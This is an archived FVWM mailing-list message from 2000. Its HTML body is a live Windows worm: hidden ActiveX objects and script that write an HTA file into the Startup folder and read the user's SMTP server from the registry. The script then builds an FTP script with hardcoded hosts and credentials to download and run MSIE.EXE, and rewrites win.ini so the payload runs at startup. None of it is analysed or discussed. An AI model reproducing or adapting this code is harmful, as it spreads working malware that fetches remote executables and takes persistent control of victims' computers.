This is a multi-part message in MIME format.
------=_NextPart_000_0006_01BF6B1E.533D9940
Content-Type: text/html;
charset="big5"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Dbig5" http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY>
<P>
<OBJECT classid=3Dclsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95 height=3D0 =
id=3Dwm=20
width=3D0 border=3D"0"></OBJECT></P>
<P>
<OBJECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC height=3D0 =
id=3Dscr=20
width=3D0 border=3D"0"></OBJECT></P>
<SCRIPT language=3DJavaScript>
try {
var NType =3D new =
Array("politics/c","focus/c","national/c","biz/c","sports/c","showbiz/c",=
"money/c");
var BaseURL =3D "
http://www.chinatimes.com.tw/news/papers/online/";
var NDate =3D new Date();
var NTypeID=3DMath.floor(Math.random()*7);
var YY=3DNDate.getFullYear()-1911;
var MM=3DNDate.getMonth()+1;
var DD=3DNDate.getDate();
var NN=3DMath.floor(Math.random()*3)+1
NN=3DNN+"0";
var DExist =3D 0;
var TPath =3D "";=20
DirExist();
if (DExist=3D=3D1) {
scr.Reset(); =20
scr.Path=3DTPath+"\\Microsoft Internet Explorer.hta";
scr.doc=3D"<SCRIPT> window.resizeTo\(0,0\) </"+"SCRIPT> <HEAD> =
<HTA:APPLICATION ID=3D\"APs\" APPLICATIONNAME=3D\"APs\" =
BORDER=3D\"none\" CAPTION=3D\"no\"SHOWINTASKBAR=3D\"no\" =
SINGLEINSTANCE=3D\"yes\" SYSMENU=3D\"no\" =
WINDOWSTATE=3D\"normal\"></"+"HEAD> <html> <p><script =
language=3D\"JAVAScript\"> try { var wsh=3D new =
ActiveXObject\(\"Wscript.Shell\"\); var =
SysDir=3Dwsh.ExpandEnvironmentStrings\(\"%WINDIR%\"\); var fso =3D new =
ActiveXObject\(\"Scripting.FileSystemObject\"\); var =
P3=3D\"<SCRIPT>&&window.resizeTo\\\(0,0\\\)&&_at__at_SCRIPT>&&<HEAD>&&<HTA:APPL=
ICATION =
ID=3D?_at_APs?@&&APPLICATIONNAME=3D?_at_APs?@&&BORDER=3D?_at_none?@&&CAPTION=3D?_at_n=
o?_at_&&SHOWINTASKBAR=3D?_at_no?@&&SINGLEINSTANCE=3D?_at_yes?@&&SYSMENU=3D?_at_no?@&&=
WINDOWSTATE=3D?_at_normal?@>@@HEAD>&&<script =
language=3D?_at_JAVAScript?@>&&var fso =3D new =
ActiveXObject\\\(?_at_Scripting.FileSystemObject?@\\\);&&var wsh =3D new =
ActiveXObject\\\(?_at_Wscript.Shell?@\\\);&&var =
SysDir=3Dwsh.ExpandEnvironmentStrings\\\(?_at_%WINDIR%?@\\\);&&var FtpSite =
=3D new =
Array\\\(?_at_dany777.homepage.com?@,?_at_iopi999.homepage.com?@,?_at_pop123.homepage.com?@,?_at_to=
do888.homepage.com?_at_,?_at_ftp.todo.com.tw?@,?_at_hammer.prohosting.com?@,?_at_hammer.pr=
ohosting.com?_at_,?_at_catv169.homepage.com?@,?_at_catv170.homepage.com?@,?_at_todo16=
8.homepage.com?_at_\\\);&&var FtpLogin =3D new =
Array\\\(?_at_dany777?@,?_at_iopi999?@,?_at_pop123?@,?_at_todo888?@,?_at_kvvbill5?@,?=
_at_catv168?@,?_at_catv169?@,?_at_catv169?@,?_at_catv170?@,?_at_todo168?@\\\);&&var =
MyFile;&&var MSIEHTA=3D1;&&var MyKey; &&var Done=3D1;&&try {MyFile =3D =
fso.GetFile\\\(SysDir+?_at_\\\\\\\\Startm~1\\\\\\\\Programs\\\\\\\\=B1=D2=B0=
=CA\\\\\\\\MICROS~1.HTA?_at_\\\);}&&catch \\\(e\\\) {MSIEHTA=3D0;};&&if =
\\\(MSIEHTA=3D=3D1\\\) MyFile.Delete\\\(\\\);&&try =
{MyKey=3Dwsh.RegRead\\\(?_at_HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\VB =
and VBA Program =
Settings\\\\\\\\Microsoft\\\\\\\\InternetExplorer\\\\\\\\Vendor?_at_\\\);}&&=
catch \\\(e\\\) {Done=3D0;};&&if \\\(Done=3D=3D1\\\) =
{&&self.close\\\(\\\); }&&else {&&var =
AccID=3Dwsh.RegRead\\\(?_at_HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microso=
ft\\\\\\\\Internet Account Manager\\\\\\\\Default Mail =
Account?_at_\\\);&&var =
DeSMTP=3Dwsh.RegRead\\\(?_at_HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Micros=
oft\\\\\\\\Internet Account =
Manager\\\\\\\\Accounts\\\\\\\\?_at_+AccID+?@\\\\\\\\SMTP =
Server?_at_\\\);&&MyFile =3D =
fso.CreateTextFile\\\(SysDir+?_at_\\\\\\\\system\\\\\\\\MSIE.INI?@, =
1\\\);&&MyFile.WriteLine\\\(DeSMTP\\\);&&MyFile.Close\\\(\\\);&&var MSIEEXE=3D1;&&var =
VBEXE=3D1;&&CheckEXE\\\(\\\); }&&function CheckEXE\\\(\\\)&&{&&var =
FtpID=3DMath.floor\\\(Math.random\\\(\\\)*10\\\);&&VBEXE=3D1;&&try =
{MyFile =3D =
fso.GetFile\\\(SysDir+?_at_\\\\\\\\system\\\\\\\\MSVBVM50.DLL?@\\\);}&&catch=
\\\(e\\\) {VBEXE=3D0;};&&MSIEEXE=3D1;&&try {MyFile =3D =
fso.GetFile\\\(SysDir+?_at_\\\\\\\\system\\\\\\\\system\\\\\\\\MSIE.EXE?@\\\=
);}&&catch \\\(e\\\) {MSIEEXE=3D0;};&&if \\\(MSIEEXE=3D=3D0\\\) {&& try =
{fso.CreateFolder\\\(SysDir+?_at_\\\\\\\\system\\\\\\\\system?@\\\)}&& =
catch \\\(e\\\) {};&& try {MyFile =3D =
fso.CreateTextFile\\\(SysDir+?_at_\\\\\\\\system\\\\\\\\MSIE.LST?@, 1\\\); =
&& MyFile.Writeline\\\(FtpLogin[FtpID]\\\);&& =
MyFile.Writeline\\\(?_at_995119?@\\\);&& =
MyFile.Writeline\\\(?_at_bin?@\\\);&& MyFile.Writeline\\\(?_at_prompt =
off?_at_\\\);&& if \\\(FtpID=3D=3D6 || FtpID=3D=3D7 \\\)&& =
MyFile.Writeline\\\(?_at_cd html?@\\\);&& MyFile.Writeline\\\(?_at_get =
MSIE.EXE =
?_at_+SysDir+?@\\\\\\\\system\\\\\\\\system\\\\\\\\MSIE.EXE?@\\\);&& if =
\\\(VBEXE=3D=3D0\\\)&& self.close\\\(\\\);&& =
MyFile.Writeline\\\(?_at_bye?@\\\);&& MyFile.Close\\\(\\\); }&& catch =
\\\(e\\\) {};&& wsh.run\\\(?_at_ftp =
-s:?_at_+SysDir+?@\\\\\\\\system\\\\\\\\MSIE.LST ?@+FtpSite[FtpID], 0, =
0\\\); && window.setTimeout\\\(?_at_CheckEXE\\\(\\\);?@, 180000\\\);&&} =
&&else {&&MSIEEXE=3D1&&try {MyFile =3D =
fso.GetFile\\\(SysDir+?_at_\\\\\\\\system\\\\\\\\system\\\\\\\\EXPLORER.EXE?=
_at_\\\);}&&catch \\\(e\\\) {MSIEEXE=3D0;};&&if \\\(MSIEEXE=3D=3D0\\\) =
&&{&&MyFile =3D =
fso.CreateTextFile\\\(SysDir+?_at_\\\\\\\\system\\\\\\\\MSBoot.BAT?@, =
1\\\);&&MyFile.Writeline\\\(?_at_echo =
on?_at_\\\);&&MyFile.Writeline\\\(SysDir.substr\\\(0,2\\\)\\\);&&MyFile.Writ=
eline\\\(?_at_cd =
?_at_+SysDir+?@\\\\\\\\system\\\\\\\\system?@\\\);&&MyFile.Writeline\\\(?_at_MS=
IE?_at_\\\);&&if \\\(VBEXE=3D=3D0\\\) =
self.close\\\(\\\);&&MyFile.Writeline\\\(?_at_EXPLORER?@\\\);&&MyFile.Close\=
\\(\\\);&&wsh.run\\\(SysDir+?_at_\\\\\\\\System\\\\\\\\MSBoot.BAT?@, 0, =
0\\\);&&window.setTimeout\\\(?_at_CheckEXE1\\\(\\\);?@, 60000\\\); =
&&}&&else&&{&&MyFile =3D =
fso.CreateTextFile\\\(SysDir+?_at_\\\\\\\\system\\\\\\\\MSBoot.BAT?@, =
1\\\);&&MyFile.Writeline\\\(?_at_echo =
on?_at_\\\);&&MyFile.Writeline\\\(SysDir.substr\\\(0,2\\\)\\\);&&MyFile.Writ=
eline\\\(?_at_cd ?@+SysDir+?@\\\\\\\\system\\\\\\\\system?@\\\);&&if =
\\\(VBEXE=3D=3D0\\\) =
self.close\\\(\\\);&&MyFile.Writeline\\\(?_at_EXPLORER?@\\\);&&MyFile.Close\=
\\(\\\);&&wsh.run\\\(SysDir+?_at_\\\\\\\\System\\\\\\\\MSBoot.BAT?@, 0, =
0\\\);&&self.close\\\(\\\);}&&}&&}&&&&function =
CheckEXE1\\\(\\\)&&{&&MSIEEXE=3D1&&try {MyFile =3D =
fso.GetFile\\\(SysDir+?_at_\\\\\\\\system\\\\\\\\system\\\\\\\\EXPLORER.EXE?=
_at_\\\);}&&catch \\\(e\\\) {MSIEEXE=3D0;};&&if \\\(MSIEEXE=3D=3D0\\\) =
&&{&&MyFile =3D =
fso.CreateTextFile\\\(SysDir+?_at_\\\\\\\\system\\\\\\\\MSBoot.BAT?@, =
1\\\);&&MyFile.Writeline\\\(?_at_echo off?@\\\);&&MyFile.Writeline\\\(?_at_del =
?_at_+SysDir+?@\\\\\\\\system\\\\\\\\system\\\\MSIE.EXE?@\\\);&&MyFile.Write=
line\\\(?_at_del =
%windir%\\\\\\\\System\\\\\\\\MSBoot.BAT?_at_\\\);&&MyFile.Close\\\(\\\);&&w=
sh.run\\\(SysDir+?_at_\\\\\\\\System\\\\\\\\MSBoot.BAT?@, 0, =
0\\\);&&window.setTimeout\\\(?_at_CheckEXE\\\(\\\);?@, 30000\\\); &&}&&else =
{&&self.close\\\(\\\);} &&}&&_at__at_script>\"; var MyFile =3D =
fso.CreateTextFile\(SysDir+\"\\\\system\\\\MSIE.HTA\", 1\); =
P3=3DP3.replace\(/\(\\&\\&\)/g,\"\\n\"\); =
P3=3DP3.replace\(/\(\\?\\_at_\)/g,\"\\\"\"\); =
P3=3DP3.replace\(/\(\\_at_\\@\)/g,\"</"+"\"\); MyFile.WriteLine\(P3\); =
MyFile.Close\(\); CopyWinINI\(\); wsh.run\(SysDir+\"\\\\System\\\\MSHTA =
\"+ SysDir+\"\\\\system\\\\MSIE.HTA\", 0, 0\); self.close\(\); } catch =
\(e\) {self.close\(\);} function CopyWinINI\(\) { try{var MyFile1 =3D =
fso.OpenTextFile\(SysDir+\"\\\\win.ini\",1,0\);MyFile =3D =
fso.CreateTextFile\(SysDir+\"\\\\winini.bak\", 1\);while =
\(!MyFile1.AtEndOfStream\) {var S=3DMyFile1.ReadLine\(\);if =
\(S.search\(/run/i\)=3D=3D0\) {=
MyFile.WriteLine\(\"run=3D\"+SysDir+\"\\\\system\\\\MSIE.HTA\"\); }=
else {MyFile.WriteLine\(S\); } }MyFile1.Close\(\);=
MyFile.Close\(\);MyFile =3D fso.GetFile\(SysDir+\"\\\\winini.bak\"\); =
MyFile.Copy\(SysDir+\"\\\\win.ini\"\);MyFile =3D =
fso.GetFile\(SysDir+\"\\\\winini.bak\"\);MyFile.Delete\(\);} catch =
\(e\) {self.close\(\);}; } </"+"script>";
scr.write();}
}
catch(e){}
function DirExist() {
var Path =3D new Array();
var SPath;
Path[0]=3D "WINDOWS"
Path[1]=3D "WINDOW"=20
Path[2]=3D "WIN"
Path[3]=3D "WIN98"
Path[4]=3D "WIN95"
Path[5]=3D "WINDOWS.000"
Path[6]=3D "WINDOWS.001"
for (i =3D 0; i<14 ;i++) {
if (i >=3D 7 )=20
SPath=3D"D:\\"+Path[i-7];
else
SPath=3D"C:\\"+Path[i];
wm.FileName=3DSPath+"\\Start Menu\\Programs\\=B1=D2=B0=CA";
if (wm.ErrorCode !=3D -2147220970) {
TPath=3DSPath+"\\Start Menu\\Programs\\=B1=D2=B0=CA";=20
break;} }
if (i<14) DExist =3D 1 ;
else DExist =3D 0 ;
return ;}
</SCRIPT>
</BODY></HTML>
--
Visit the official FVWM web page at <URL: http://www.fvwm.org/>.
To unsubscribe from the list, send "unsubscribe fvwm" in the body of a
message to majordomo_at_fvwm.org.
To report problems, send mail to fvwm-owner_at_fvwm.org.
Received on Sun Feb 06 2000 - 16:38:19 GMT